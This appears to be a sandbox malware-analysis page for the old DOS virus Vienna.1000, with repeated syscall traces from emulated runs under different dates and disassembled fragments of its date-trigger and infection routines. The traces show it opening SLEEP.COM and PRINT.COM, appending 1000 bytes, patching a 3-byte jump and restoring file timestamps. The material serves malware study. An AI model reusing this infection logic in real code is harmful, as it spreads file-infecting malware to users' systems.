Sample viewer

vx.netlux.org/Virus.DOS.Vienna.1000

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:07.690525692Z 48 PC: 12e53 | Get DOS version
2018-12-17T22:58:07.691653881Z 47 PC: 12e5f | Get disk transfer address
2018-12-17T22:58:07.693577167Z 26 PC: 12e72 | Set disk transfer address
2018-12-17T22:58:07.694950375Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-17T22:58:07.697382354Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-17T22:58:07.707141354Z 78 PC: 12f61 | Find first file
2018-12-17T22:58:07.714151452Z 67 PC: 12f9f | Get or set file attributes
2018-12-17T22:58:07.720336304Z 67 PC: 12fb1 | Get or set file attributes
2018-12-17T22:58:07.737920316Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:07.745061529Z 87 PC: 12fc8 | Get or set file date and time
2018-12-17T22:58:07.746684617Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-17T22:58:07.750124486Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:58:07.757163574Z 66 PC: 12ff9 | Move file pointer
2018-12-17T22:58:07.758735201Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-17T22:58:07.768021393Z 66 PC: 1302f | Move file pointer
2018-12-17T22:58:07.769513598Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:07.780240336Z 87 PC: 13051 | Get or set file date and time
2018-12-17T22:58:07.782372328Z 62 PC: 13055 | Close file
2018-12-17T22:58:07.791876412Z 67 PC: 13064 | Get or set file attributes
2018-12-17T22:58:07.803526186Z 26 PC: 13071 | Set disk transfer address
2018-12-17T22:58:07.805251135Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:58:07.807804813Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:58:07.809100996Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T22:58:07.810345243Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-17T22:58:07.813716052Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-17T22:58:07.830178805Z 78 PC: 12b79 | Find first file
2018-12-17T22:58:07.837125098Z 79 PC: 12b7f | Find next file
2018-12-17T22:58:07.841041404Z 67 PC: 12bb7 | Get or set file attributes
2018-12-17T22:58:07.847480752Z 67 PC: 12bc9 | Get or set file attributes
2018-12-17T22:58:07.860848803Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:07.869930076Z 87 PC: 12be0 | Get or set file date and time
2018-12-17T22:58:07.871793659Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-17T22:58:07.874617957Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:58:07.881844239Z 66 PC: 12c11 | Move file pointer
2018-12-17T22:58:07.890414413Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-17T22:58:07.899740808Z 66 PC: 12c47 | Move file pointer
2018-12-17T22:58:07.901506943Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:07.9175022Z 87 PC: 12c69 | Get or set file date and time
2018-12-17T22:58:07.919732112Z 62 PC: 12c6d | Close file
2018-12-17T22:58:07.928580097Z 67 PC: 12c7c | Get or set file attributes
2018-12-17T22:58:07.940535186Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:12.473868777Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:12.476769101Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:12.481226095Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:12.484779757Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:12.487930883Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:12.494102876Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:12.499821459Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:12.703443694Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:12.712343811Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:12.714828978Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:12.718256351Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:12.728810476Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:12.730594861Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:12.742645086Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:12.747498772Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:12.759358712Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:12.76160552Z 62 PC: 13055 | Close file
2018-12-25T12:36:12.775535993Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:12.79310519Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:12.795310193Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:12.797971608Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:12.800172255Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:12.802101021Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:12.811826151Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:12.819901305Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:12.824104158Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:12.831594295Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:12.853252294Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:12.866151347Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:12.86851107Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:12.872322968Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:12.885256921Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:12.887446683Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:12.902175541Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:12.903682474Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:12.911193952Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:12.913664103Z 62 PC: 12c6d | Close file
2018-12-25T12:36:12.922871088Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:12.934675372Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:13.905039399Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:13.907742917Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:13.909353298Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:13.910859251Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:13.91403641Z 42 PC: 12e96 | Get date 0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
0x12ea7: cmp dl, bh
0x12ea9: jge 0x12eae
0x12eab: jmp 0x12ede
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si
0x12eb4: mov ah, 9
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0
2018-12-25T12:36:13.916614369Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:13.923517667Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:13.930929747Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:13.951039133Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:13.958302234Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:13.959671135Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:13.963283197Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:13.970392624Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:13.971880338Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:13.989618215Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:13.991458196Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:13.999329806Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.007828652Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.017307929Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.028682533Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.038563779Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.040122637Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.041604679Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.046855494Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.049519627Z 42 PC: 12aae | Get date 0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
0x12abf: cmp dl, bh
0x12ac1: jge 0x12ac6
0x12ac3: jmp 0x12af6
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si
0x12acc: mov ah, 9
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0
2018-12-25T12:36:14.052341018Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.060435031Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.06443641Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.074365369Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.082673454Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.090837819Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.09201588Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.094275916Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.101997422Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.103475721Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.112921795Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.115447242Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.122758498Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.124301186Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.134454095Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.145581291Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:13.923680174Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:13.925585944Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:13.927335464Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:13.928663341Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:13.931141156Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:13.942944712Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:13.949720349Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:13.956614069Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:13.97468895Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:13.996903738Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:13.998662013Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.002422817Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.010097123Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.011537662Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.022096122Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.023796574Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.031377991Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.033948795Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.043052781Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.054102201Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.055782716Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.058396252Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.059667985Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.061069687Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.064452153Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.070670482Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.075725578Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.079527134Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.086084772Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.097183361Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.106323802Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.107889911Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.110580024Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.118244663Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.120904538Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.133746411Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.136446156Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.145539824Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.147279246Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.156167499Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.168496051Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:14.072667628Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.074030607Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.075102992Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:14.075997109Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:14.078654156Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.084419835Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.089585397Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.123636913Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.135800825Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:14.138002108Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.141015257Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.147266312Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.148683988Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.158563299Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.160309205Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.16662384Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.16849344Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.17633919Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.185843499Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.18717026Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.188823666Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.190035242Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.191944493Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.195819716Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.201983784Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.204441042Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.211832004Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.221664444Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.228364861Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.230404827Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.232469437Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.238714041Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.240522529Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.252061572Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.253483768Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.260204832Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.26167075Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.268191464Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.280519592Z 26 PC: 12c89 | Set disk transfer address

